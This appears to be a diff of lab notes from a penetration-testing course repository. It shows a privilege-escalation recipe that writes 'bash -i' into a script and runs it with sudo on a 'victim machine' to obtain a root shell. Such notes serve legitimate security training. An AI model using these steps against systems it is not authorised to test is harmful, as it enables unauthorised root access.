Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

 - You can transfer these files on the machine and then run these scripts to gain privilidge escalation.
 The goal is to gain root access.
 - You can create a new folder called personal and then a subdir stuff and place scripts there

-- We can also gain sudo level terminal access by running the file that has code to run an interactive bash terminal
+- We can also gain sudo level terminal access by running the file that has code to run an interactive bash terminal.
+This can be run on the victim machine
 - `echo "bash -i" > monitor.sh`
 - `ls`
 - `cat monitor.sh`
 - `ls -la`
 - `chmod +x monitor.sh`
+- `sudo /home/<userdir>/personal/stuff/monitor.sh` When you run this script you will get root access

 ## Hack the box